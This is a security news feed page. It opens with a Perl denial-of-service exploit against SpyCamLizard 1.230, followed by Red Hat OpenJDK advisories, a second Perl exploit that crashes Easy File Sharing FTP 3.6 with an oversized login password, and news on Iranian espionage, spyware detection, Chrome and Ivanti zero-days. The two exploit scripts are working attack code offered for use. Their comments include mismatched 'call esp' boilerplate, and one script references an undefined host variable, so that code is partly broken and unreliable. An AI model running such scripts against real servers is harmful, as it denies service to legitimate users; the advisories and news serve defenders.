SpyCamLizard version 1.230 remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: SpyCamLizard 1.230 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 18 january 2024# Vendor Homepage: http://www.spycamlizard.com# Download to demo: https://drive.google.com/file/d/1daFgHh0VzbkDzIp41-imZbPoc6ETZDq2/view?usp=sharing# Notification vendor: Yes reported# Tested Version: SpyCamLizard 1.230 - Denial of Service (DoS)# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://youtu.be/Ksg8L-ZX2Us#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The SpyCamLizard does not correctly handle the amount of data or bytes sent.#When authenticating to the SpyCamLizard with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";print "[+] Connecting to $ip:$port\n";my $exploit = "x41" x 3000;my $httpsocket = IO::Socket::INET->new(    PeerAddr => $host,    PeerPort => $port,    Proto    => "tcp",);$httpsocket->send("GET " . $exploit . " HTTP/1.0\r\n\r\n");$httpsocket->close();    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] SpyCamLizard 1.230 - Denial of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }

SpyCamLizard 1.230 Denial Of Service

Red Hat Security Advisory 2024-0250-03 - An update is now available for OpenJDK. Issues addressed include code execution and out of bounds access vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0250.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenJDK 21.0.2 security update  
Advisory ID:        RHSA-2024:0250-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0250  
Issue date:         2024-01-17  
Revision:           03  
CVE Names:          CVE-2024-20918  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 21 (21.0.2) for Windows serves as a replacement for the Red Hat build of OpenJDK 21 (21.0.1) and includes security and bug fixes. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)

* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)

* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)

* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)

* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-20918

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2257728  
https://bugzilla.redhat.com/show_bug.cgi?id=2257837  
https://bugzilla.redhat.com/show_bug.cgi?id=2257853  
https://bugzilla.redhat.com/show_bug.cgi?id=2257859  
https://bugzilla.redhat.com/show_bug.cgi?id=2257874

Red Hat Security Advisory 2024-0250-03

Red Hat Security Advisory 2024-0246-03 - An update is now available for OpenJDK. Issues addressed include code execution and out of bounds access vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0246.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenJDK 17.0.10 security update  
Advisory ID:        RHSA-2024:0246-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0246  
Issue date:         2024-01-17  
Revision:           03  
CVE Names:          CVE-2024-20918  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 17 (17.0.10) for Windows serves as a replacement for the Red Hat build of OpenJDK 17 (17.0.9) and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)

* OpenJDK: incorrect handling of ZIP files with duplicate entries (8276123) (CVE-2024-20932)

* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)

* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)

* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)

* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-20918

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2257720  
https://bugzilla.redhat.com/show_bug.cgi?id=2257728  
https://bugzilla.redhat.com/show_bug.cgi?id=2257837  
https://bugzilla.redhat.com/show_bug.cgi?id=2257853  
https://bugzilla.redhat.com/show_bug.cgi?id=2257859  
https://bugzilla.redhat.com/show_bug.cgi?id=2257874

Red Hat Security Advisory 2024-0246-03

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers 


Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

High-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the U.K., and the U.S. have been targeted by an Iranian cyber espionage group called Mind Sandstorm since November 2023.
The threat actor "used bespoke phishing lures in an attempt to socially engineer targets into downloading malicious files," the

Cyber Espionage / Threat Intelligence

High-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the U.K., and the U.S. have been targeted by an Iranian cyber espionage group called **Mind Sandstorm** since November 2023.

The threat actor "used bespoke phishing lures in an attempt to socially engineer targets into downloading malicious files," the Microsoft Threat Intelligence team said in a Wednesday analysis, describing it as a "technically and operationally mature subgroup of Mind Sandstorm."

The attacks, in select cases, involve the use of a previously undocumented backdoor dubbed MediaPl, indicating ongoing endeavors by Iranian threat actors to refine their post-intrusion tradecraft.

Mint Sandstorm, also known as APT35, Charming Kitten, TA453, and Yellow Garuda, is known for its adept social engineering campaigns, even resorting to legitimate but compromised accounts to send bespoke phishing emails to prospective targets. It's assessed to be affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC).

The sub-cluster, per Redmond, engages in resource-intensive social engineering to single out journalists, researchers, professors, and other individuals with insights on security and policy issues of interest to Tehran.

The latest intrusion set is characterized by the use of lures pertaining to the Israel-Hamas war, sending innocuous emails under the guise of journalists and other high-profile individuals to build rapport with targets and establish a level of trust before attempting to deliver malware to targets.

Microsoft said it's likely the campaign is an effort undertaken by the nation-state threat actor to collect perspectives on events related to the war.

The use of breached accounts belonging to the people they sought to impersonate in order to send the email messages is a new Mind Sandstorm tactic not seen before, as is its use of the curl command to connect to the command-and-control (C2) infrastructure.

Should the targets engage with the threat actor, they are sent a follow-up email containing a malicious link that points to a RAR archive file, which, when opened, leads to the retrieval of Visual Basic scripts from the C2 server to persist within the targets' environments.

The attack chains further pave the way for custom implants like MischiefTut or MediaPl, the former of which was first disclosed by Microsoft in October 2023.

Implemented in PowerShell, MischiefTut is a basic backdoor that can run reconnaissance commands, write outputs to a text file, and download additional tools on a compromised system. The first recorded use of the malware dates back to late 2022.

MediaPl, on the other hand, masquerades as Windows Media Player and is designed to transmit encrypted communications to its C2 server and launch command(s) it has received from the server.

"Mint Sandstorm continues to improve and modify the tooling used in targets' environments, activity that might help the group persist in a compromised environment and better evade detection," Microsoft said.

"The ability to obtain and maintain remote access to a target's system can enable Mint Sandstorm to conduct a range of activities that can adversely impact the confidentiality of a system."

The disclosure comes as Dutch newspaper De Volkskrant revealed earlier this month that Erik van Sabben, a Dutch engineer recruited by Israel and U.S. intelligence services, may have used a water pump to deploy an early variant of the now-infamous Stuxnet malware in an Iranian nuclear facility sometime in 2007.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers Masquerade as Journalists to Spy on Israel-Hamas War Experts

By Waqas
Kaspersky has recently launched a tool called iShutdown, designed not only to detect the notorious Pegasus spyware but also to identify other malware threats on iOS devices.
This is a post from HackRead.com Read the original post: Kaspersky’s iShutdown Tool Detects Pegasus Spyware on iOS Devices

The iShutdown tool has been launched a few weeks after Kaspersky cybersecurity researchers revealed significant insights into Operation Triangulation. This investigation delves into how spyware threats compromise iPhones.

Kaspersky’s Global Research and Analysis Team (GReAT) has introduced a new tool that lets users detect Pegasus, a popular iOS spyware known for targeting journalists and activists. This lightweight method called iShutdown will identify signs of spyware on Apple iOS devices, including three prominent spyware families Pegasus, QuaDream’s Reign, and Intellexa’s Predator.

The iShutdown tool is now available to the public, seven months after Kaspersky Labs initially reported the hacking of its employees’ iPhones, referred to as Operation Triangulation. In December 2023, the company released an update disclosing that hackers likely exploited an obscure hardware feature during spyware attacks against iPhone users.

The method was tested on a set of Pegasus-compromised iPhones. However, it must be noted that this method/tool is different from the iShutdown iOS application that allows Mac devices to shut down/sleep/restart/log out.

According to the cybersecurity firm, traces of Pegasus-related processes were discovered in a text-based system log file called “Shutdown.log” on iPhones compromised with the spyware. 

The log file is stored within the sysdiagnose archive of iOS devices. It records every reboot event with its environmental characteristics and is a generally overlooked forensic artefact. It can have entries dating back several years, providing valuable information. When a user initiates a reboot, the operating system terminates running processes, flushing memory buffers, and waiting for a normal reboot.

Its analysis revealed “sticky” processes that hinder reboots. Pegasus-related processes were found in over four reboot delay notices. These anomalies during reboot procedures allowed the tool to flag potential infections with high accuracy. Further analysis revealed a similar filesystem path used by all three spyware families, “/private/var/db/” for Pegasus and Reign, and “/private/var/tmp/” for Predator, as an indicator of compromise.

Kaspersky GReAT’s lead security researcher, Maher Yamout, has confirmed the log’s consistency with other Pegasus infections, making it a reliable forensic artefact for infection analysis. The tool offers enhanced protection to a broader user base.

“Compared to more time-consuming acquisition methods such as forensic device imaging or a full iOS backup, Shutdown.log file recovery is pretty simple,” explained Yamout.

Kaspersky has developed a Python3 utility on GitHub for macOS, Windows, and Linux users to detect spyware. The tool extracts, analyzes, and parses Shutdown.log artifacts. It simplifies detection and raises awareness, empowering users to take control of their digital security.

However, Kaspersky suggests users adopt a holistic approach towards data and device security. The company recommends users perform daily reboots, use lockdown mode, disable iMessage and FaceTime, timely iOS updates, and regular check backups.

The announcement comes after SentinelOne’s report revealing that information stealers targeting macOS like KeySteal, Atomic, and JaskaGo are quickly adapting to circumvent Apple’s built-in antivirus technology called XProtect.

****_RELATED ARTICLES_****

1.  **QuaDream, Israeli iPhone hacking spyware firm, to shut down**
2.  **European Spyware Vendor Offering Android, iOS Device Exploits**
3.  **iPhone Spyware Exploits Obscure Chip Feature, Targets Researchers**
4.  **Apple’s iPhone Hack Attack Warnings Spark Political Firestorm in India**
5.  **NSO zero-click iMessage exploit hacks iPhone without need to click links**

Kaspersky’s iShutdown Tool Detects Pegasus Spyware on iOS Devices

By Waqas
Is Google Incognito mode really private? Well, the answer is no. Why? Let's take a closer look...
This is a post from HackRead.com Read the original post: Google Incognito Mode: New Disclaimer Reveals Data Tracking

Google’s New Disclaimer Confuses Users with Data Collection Admission – It All Happened After the Company Had to Face a Whopping $5 Billion Lawsuit.

For years, “Go incognito” has been the whispered mantra for those seeking online privacy. Google Chrome’s private browsing mode promised a cloak of anonymity, letting users roam the web free from watchful eyes. But a recent lawsuit and a quiet update by Google have cast a shadow over this digital haven, raising questions about its effectiveness and the company’s commitment to user privacy.

****Google’s New Disclaimer****

Google has updated its Incognito mode ‘disclaimer’ to reflect its data collection practices, which were previously unnoticed and got the company into legal trouble. The Chrome Incognito mode disclaimer initially stated users could “browse privately,” but the new version claims more privacy.

The update was added to the Chrome Canary build, a version (122.0.6251.0) created for developers that includes experimental releases and is updated daily. The Incognito mode disclaimer previously stated:

“Now you can browse privately, and other people who use this device won’t see your activity. However, downloads, bookmarks, and reading list items will be saved.”

After the update in Canary, the disclaimer states the following:

“Others who use this device won’t see your activity, so you can browse more privately. This won’t change how data is collected by websites you visit and the services they use, including Google. Downloads, bookmarks, and reading list items will be saved.”

Old and New disclaimers (Screenshot credit: Hackread.com)

Both versions acknowledge that web activity may still be visible to sites, but the newer version informs users that websites, including Google, continue to collect browsing data in Incognito tabs, allowing tracking of Incognito users and Google users using Google services like Ad Manager and Analytics. Judge Yvonne Gonzalez Rogers cited this as a reason for ruling against Google’s motion for summary judgment in a privacy lawsuit.

For your information, in 2020, Google faced a $5 billion class action lawsuit for collecting user data through its services in Incognito Mode. The lawsuit alleged that Google tracked sensitive user data, such as browsing history, device data, and IP addresses even when users believed they were surfing privately.

Google initially dismissed the allegations, but US District Judge Lucy Koh disagreed, stating that Google never explicitly informed users about its continued data collection. The company then stated that the websites collect data in this mode, but the disclaimer does not mention it.

Google redesigned its Incognito mode pages, but this has not been enough. The company, thus, had to agree to pay $5 billion in settlement in December 2023, expected to be presented for court approval by February 24, 2024. It also reworded the disclaimer and changed everything else except the first paragraph to appear more transparent about data collection practices in Incognito mode.

Google has added disclaimers to Chrome Canary on Android, Windows, and other platforms when users open a new incognito tab/window. It is worth noting that Incognito mode is not anonymous, and third-party cookie tracking prevention is enabled by default to protect user activity. Still, the case highlights the need for more transparent data collection practices, particularly in sensitive features like Incognito mode, by tech giants like Google.

For insights into this, we reached out to John Bambenek, President at Bambenek Consulting. “Incognito mode, and its equivalent, to other browsers, has never offered much more privacy protection than people hiding their web viewing habits from their parents or partners,” John argued.

“This lawsuit highlights that this mode doesn’t offer much in the way of privacy at all. While organizations were concerned about what third parties might be collecting about their employees or their workplace, they should be focusing on migrating to privacy-centric, browsers, and using browsing plug-ins that prevent websites from collecting data in the first place,” he advised.

**What Does All This Mean?**

So, what does this mean for the web-weary wanderer? First, a dose of realism: incognito mode is not magic. Embrace its limitations, and consider alternative tools for truly sensitive web journeys. Second, demand more transparency. Google’s quiet update, while a step in the right direction, pales in comparison to the need for clear, comprehensive explanations of data collection practices.

Ultimately, the battle for online privacy is far from over. Google’s incognito update is a small victory, a flicker of light in the ever-growing digital surveillance landscape. But the fight for truly private browsing, for a web where anonymity isn’t an illusion, continues.

The onus lies on users to stay informed, to demand accountability, and to push for technological solutions that respect our right to digital discretion. Only then can the internet become a space where “incognito” truly means unseen, unheard, and ultimately, free?

****_RELATED ARTICLES_****

1.  **$4 billion lawsuit claim Google tracked iPhone users’ activity**
2.  **Google Facing Lawsuit Over Tracking Users in Incognito Mode**
3.  **Microsoft sued for alleged misuse of stolen Dark Web credentials**
4.  **Dutch Watchdog Sues Adobe Over Mass Collection of Citizen Data**
5.  **DuckDuckGo study claims Google Incognito searches are not private**

Google Incognito Mode: New Disclaimer Reveals Data Tracking

Easy File Sharing FTP version 3.6 remote denial of service exploit.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Easy File Sharing FTP Server 3.6 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 17 january 2024  
# Vendor Homepage:  N/A  
# Download to demo:   
# Notification vendor: No reported  
# Tested Version: Easy File Sharing FTP Server 3.6  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=U2svu2FiIVc

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the password entered by the user.  
#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x2c";  
    $payload .= "A"x2000;  
    $payload .= "\x41"x610;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

    $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!";              

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#         Easy File Sharing FTP Server 3.6 - Denied of Service       #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Easy File Sharing FTP 3.6 Denial Of Service

Google on Tuesday released updates to fix four security issues in its Chrome browser, including an actively exploited zero-day flaw.
The issue, tracked as CVE-2024-0519, concerns an out-of-bounds memory access in the V8 JavaScript and WebAssembly engine, which can be weaponized by threat actors to trigger a crash.
"By reading out-of-bounds memory, an attacker might be able to get secret values,

Browser Security / Vulnerability

Google on Tuesday released updates to fix four security issues in its Chrome browser, including an actively exploited zero-day flaw.

The issue, tracked as **CVE-2024-0519**, concerns an out-of-bounds memory access in the V8 JavaScript and WebAssembly engine, which can be weaponized by threat actors to trigger a crash.

"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service," according to MITRE's Common Weakness Enumeration (CWE).

Additional details about the nature of the attacks and the threat actors that may be exploiting them have withheld in an attempt to prevent further exploitation. The issue was reported anonymously on January 11, 2024.

"Out-of-bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page," reads a description of the flaw on the NIST's National Vulnerability Database (NVD).

The development marks the first actively exploited zero-day to be patched by Google in Chrome in 2024. Last year, the tech giant resolved a total of 8 such actively exploited zero-days in the browser.

Users are recommended to upgrade to Chrome version 120.0.6099.224/225 for Windows, 120.0.6099.234 for macOS, and 120.0.6099.224 for Linux to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Zero-Day Alert: Update Chrome Now to Fix New Actively Exploited Vulnerability

By Deeba Ahmed
Another day, another zero-day flaw driving the cybersecurity world crazy.
This is a post from HackRead.com Read the original post: Ivanti VPN Zero-Day Flaws Fuel Widespread Cyber Attacks

The vulnerabilities in Ivanti VPN devices enable remote, unauthenticated hackers to compromise targeted devices, execute arbitrary commands, infiltrate internal networks, and steal sensitive data.

Threat intelligence firm Volexity has discovered a rise in attacks exploiting two Ivanti zero-day vulnerabilities discovered in the second week of December 2023.

According to Volexity, at least 20 organizations using Ivanti Connect Secure VPN appliances have been compromised in cyberattacks leveraging Ivanti zero-day flaws, CVE-2023-46805 and CVE-2024-21887. Volexity has confirmed with “medium confidence” that the number of compromised systems is likely higher than what it discovered. 

The flaws, discovered by Volexity researchers, impacted Ivanti Connect Secure VPN and Policy Secure NAS appliances and were disclosed last week by Avanti.

On January 10, Volexity warned that a group UTA0178, supposedly affiliated with China, exploited these vulnerabilities to gain access to internal networks and steal information. On January 11, the company observed a series of targeted attacks on Ivanti VPN appliances, causing widespread exploitation of these flaws.

For your information, CVE-2023-46805 is an authentication bypass flaw with a CVSS rating of 8.2), impacting Ivanti ICS 9.x, 22.x, and Ivanti Policy Secure. The second flaw, CVE-2024-21887, is a command injection vulnerability with a CVSS score of 9.1, impacting Ivanti Connect Secure 9.x, 22.x, and Ivanti Policy Secure.

If exploited, these allow remote, unauthenticated attackers to compromise targeted devices by executing arbitrary commands, infiltrating internal networks, and stealing sensitive data.

Volexity noted that an unknown APT group launched initial attacks on ICS VPN appliances in December 2023, downloading malware tool kits for espionage. Multiple threat actors have since attacked hundreds of appliances and backdoored targets’ systems using a GIFTEDVISITOR webshell variant.

As of January 14, 2023, over 1,700 ICS VPN appliances were compromised, researchers revealed after scanning 50,000 Ivanti VPN-linked IPs. The highest percentage of victims were found in the US and Europe, impacting small-scale businesses to Fortune 500 companies in government, military, telecom, defence, tech, banking, finance, accounting, aerospace, aviation, and engineering sectors.

Mandiant also observed that a suspected state-sponsored threat actor dubbed UNC5221 leveraged these flaws last month to deploy up to five custom malware families. These include the ZIPLINE backdoor, WARPWIRE credential harvester, THINSPOOL shell script dropper, and LIGHTWIRE web shell. 

Mandiant noted in its report that threat actors UNC5221 launched “opportunistic attacks” to maintain persistence on high-priority targets that it had compromised “after a patch was inevitably released.”

Ivanti plans to release patches to fix these flaws by January 22, 2024, with final patches expected on February 19, 2024. A workaround is available to prevent exploitation until the patches are released. Organizations using vulnerable products should implement it immediately.

****_RELATED ARTICLES_****

1.  **APTs Exploiting WinRAR 0day Flaw Despite Patch Availability**
2.  **CACTUS ransomware evades exploits VPN flaws to hack networks**
3.  **Windows Defender SmartScreen Flaw Exploited with Phemedrone Stealer**
4.  **Flashpoint Uncovers 100,000+ Hidden Vulnerabilities, Including Zero-Days**
5.  **UAC-0099 Hackers Using Old WinRAR Flaw in New Cyberattack on Ukraine**

Tag

#windows